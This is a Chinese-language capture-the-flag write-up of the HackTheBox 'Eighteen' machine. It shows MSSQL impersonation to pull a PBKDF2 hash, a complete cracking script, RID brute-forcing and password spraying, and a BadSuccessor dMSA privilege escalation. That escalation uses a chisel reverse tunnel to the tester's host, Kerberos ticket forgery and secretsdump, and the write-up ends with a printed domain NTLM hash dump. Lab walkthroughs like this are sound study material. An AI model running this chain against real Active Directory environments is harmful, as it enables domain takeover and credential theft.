Eighteen - HackTheBox

基本信息

• https://app.hackthebox.com/machines/Eighteen
• 10.10.11.95

As is common in real life Windows penetration tests, you will start the Eighteen box with credentials for the following account: kevin / iNa2we6haRj2gaw!

端口扫描

80,1433和5985:

$ nmap -sC -sV -Pn 10.10.11.95
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-21 20:08 JST
Nmap scan report for 10.10.11.95
Host is up (0.19s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://eighteen.htb/
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-11-21T11:31:42
|_Not valid after:  2055-11-21T11:31:42
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2025-11-21T17:41:51+00:00; +6h31m25s from scanner time.
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h31m24s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.03 seconds

80

需要先加hosts：

10.10.11.95 eighteen.htb

财务管理相关公司官网：

随意注册登录，暂时没什么用：

mssql

给的账号密码可以连接mssql,但只是guest：

python3 examples/mssqlclient.py eighteen.htb/kevin:'iNa2we6haRj2gaw!'@10.10.11.95

常规xp_dirtree是能获取mssqlsvc访问，但破解不出来

appdev & financial_planner

但发现可以模拟切换到appdev用户，并且可以查看到一个financial_planner数据库：

然后可以看到一个users表，其中获取到admin hash：

SQL (appdev  appdev@financial_planner)> SELECT name FROM sys.tables;
SQL (appdev  appdev@financial_planner)> SELECT * FROM users;

pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133

破解部分稍微麻烦点，让GPT生成个脚本，我直接用的别人的

$ python3 crack.py
[*] Iniciando fuerza bruta PBKDF2-SHA256...
[+] Probadas 0 contraseñas...
[✔] Contraseña encontrada: iloveyou1

(其实有现成工具)：

• AnataarXVI/Werkzeug-Cracker: Werkzeug password cracker
  https://github.com/AnataarXVI/Werkzeug-Cracker

rid brute

得到了密码还需要知道用户名，nxc现在也可以通过mssql进行rid brute获取用户名

nxc mssql 10.10.11.95 -u kevin -p 'iNa2we6haRj2gaw!' --rid-brute --local-auth | cut -d ':' -f2 | cut -d '\' -f2  > users.txt

# 然后再自己稍微处理一下，只留用户
Administrator
Guest
krbtgt
DC01$
DnsAdmins
DnsUpdateProxy
mssqlsvc
SQLServer2005SQLBrowserUser$DC01
HR
IT
Finance
jamie.dunn
jane.smith
alice.jones
adam.scott
bob.brown
carol.white
dave.green

之后使用这些用户名验证得到的密码，找到一组有效的：

nxc winrm 10.10.11.95 -u  users.txt  -p 'iloveyou1'

WINRM       10.10.11.95     5985   DC01             [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)

crack.py

import hashlib
import sys

# =========================
# Configuración del Hash
# =========================
target_hash = '0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133'
salt = b'AMtzteQIG7yAbZIa'
iterations = 600000

# =========================
# Ruta al diccionario
# =========================
wordlist_path = '/path/rockyou.txt'

# =========================
# Función para derivar y comparar hashes
# =========================
def crack_password():
    try:
        with open(wordlist_path, 'r', encoding='latin-1') as f:
            for idx, line in enumerate(f):
                password = line.strip()
                derived_key = hashlib.pbkdf2_hmac(
                    'sha256',
                    password.encode(),
                    salt,
                    iterations
                )
                hex_key = derived_key.hex()

                if hex_key == target_hash:
                    print(f"[✔] Contraseña encontrada: {password}")
                    return
                if idx % 100000 == 0:
                    print(f"[+] Probadas {idx} contraseñas...")

        print("[✘] No se encontró la contraseña en el diccionario.")
    except FileNotFoundError:
        print(f"[!] Archivo no encontrado: {wordlist_path}")
        sys.exit(1)

if __name__ == "__main__":
    print("[*] Iniciando fuerza bruta PBKDF2-SHA256...")
    crack_password()

user flag

得到的有效用户名和密码winrm登录：

evil-winrm -i 10.10.11.95 -u adam.scott -p iloveyou1

dMSA Abuse to root

这里稍微需要点提示及平时积累，服务器是Windows Server 2025，存在dMSA Abuse方法：

• When Good Accounts Go Bad: Exploiting Delegated Managed Service Accounts in Active Directory
  https://unit42.paloaltonetworks.com/badsuccessor-attack-vector/
• Understanding & Mitigating BadSuccessor - SpecterOps
  https://specterops.io/blog/2025/05/27/understanding-mitigating-badsuccessor/
• Pentest-Tools-Collection/tools/ActiveDirectory/BadSuccessor.ps1 at main · LuemmelSec/Pentest-Tools-Collection
  https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1
• ADUtilities/FixTime/fixtime.py at main · 5epi0l/ADUtilities
  https://github.com/5epi0l/ADUtilities/blob/main/FixTime/fixtime.py

Import-Module .\BadSuccessor.ps1

BadSuccessor -mode exploit -Path "OU=Staff,DC=eighteen,DC=htb" -Name "bad_DMSA" -DelegatedAdmin "adam.scott" -DelegateTarget "Administrator" -domain "eighteen.htb"

# 打通代理，申请票据
# local
$ ./chisel_1.7.0-rc7_darwin_amd64 server -p 9999 --reverse
# target
.\chisel.exe client 10.10.14.7:9999 R:socks

# 同步时间,因为目标机器只对外开了少数端口
$ sudo python3 fixtime.py -u http://10.10.11.95

# 请求票据
$ proxychains4 python3 examples/getST.py eighteen.htb/adam.scott:iloveyou1 -impersonate 'bad_DMSA$' -dc-ip 10.10.11.95  -dmsa -self

# 使用dmsa票据获取服务票据
$export KRB5CCNAME=bad_DMSA\$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache
proxychains4 python3 examples/getST.py eighteen.htb/'bad_DMSA$' -k -no-pass -dc-ip 10.10.11.95 -spn cifs/dc01.eighteen.htb

# 使用服务票据
export KRB5CCNAME=bad_DMSA\$@cifs_dc01.eighteen.htb@EIGHTEEN.HTB.ccache
proxychains4 python3 examples/secretsdump.py -k -no-pass dc01.eighteen.htb -just-dc-user Administrator -dc-ip 10.10.11.95

0b133be956bfaddf9cea56701affddec

root flag

然后使用Administrator hash登录：

$ evil-winrm -i 10.10.11.95 -u Administrator -H 0b133be956bfaddf9cea56701affddec

hashdump

proxychains4 python3 examples/secretsdump.py -k -no-pass dc01.eighteen.htb -just-dc-ntlm -dc-ip 10.10.11.95

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a7c7a912503b16d8402008c1aebdb649:::
mssqlsvc:1601:aad3b435b51404eeaad3b435b51404ee:c44d16951b0810e8f3bbade300966ec4:::
eighteen.htb\jamie.dunn:1606:aad3b435b51404eeaad3b435b51404ee:9fbaaf9e93e576187bb840e93971792a:::
eighteen.htb\jane.smith:1607:aad3b435b51404eeaad3b435b51404ee:42554e3213381f9d1787d2dbe6850d21:::
eighteen.htb\alice.jones:1608:aad3b435b51404eeaad3b435b51404ee:43f8a72420ee58573f6e4f453e72843a:::
eighteen.htb\adam.scott:1609:aad3b435b51404eeaad3b435b51404ee:9964dae494a77414e34aff4f34412166:::
eighteen.htb\bob.brown:1610:aad3b435b51404eeaad3b435b51404ee:7e86c41ddac3f95c986e0382239ab1ea:::
eighteen.htb\carol.white:1611:aad3b435b51404eeaad3b435b51404ee:6056d42866209a6744cb6294df075640:::
eighteen.htb\dave.green:1612:aad3b435b51404eeaad3b435b51404ee:7624e4baa9c950aa3e0f2c8b1df72ee9:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d79b6837ac78c51c79aab3d970875584:::

参考资料

• When Good Accounts Go Bad: Exploiting Delegated Managed Service Accounts in Active Directory
  https://unit42.paloaltonetworks.com/badsuccessor-attack-vector/
• Understanding & Mitigating BadSuccessor - SpecterOps
  https://specterops.io/blog/2025/05/27/understanding-mitigating-badsuccessor/
• Pentest-Tools-Collection/tools/ActiveDirectory/BadSuccessor.ps1 at main · LuemmelSec/Pentest-Tools-Collection
  https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1
• AnataarXVI/Werkzeug-Cracker: Werkzeug password cracker
  https://github.com/AnataarXVI/Werkzeug-Cracker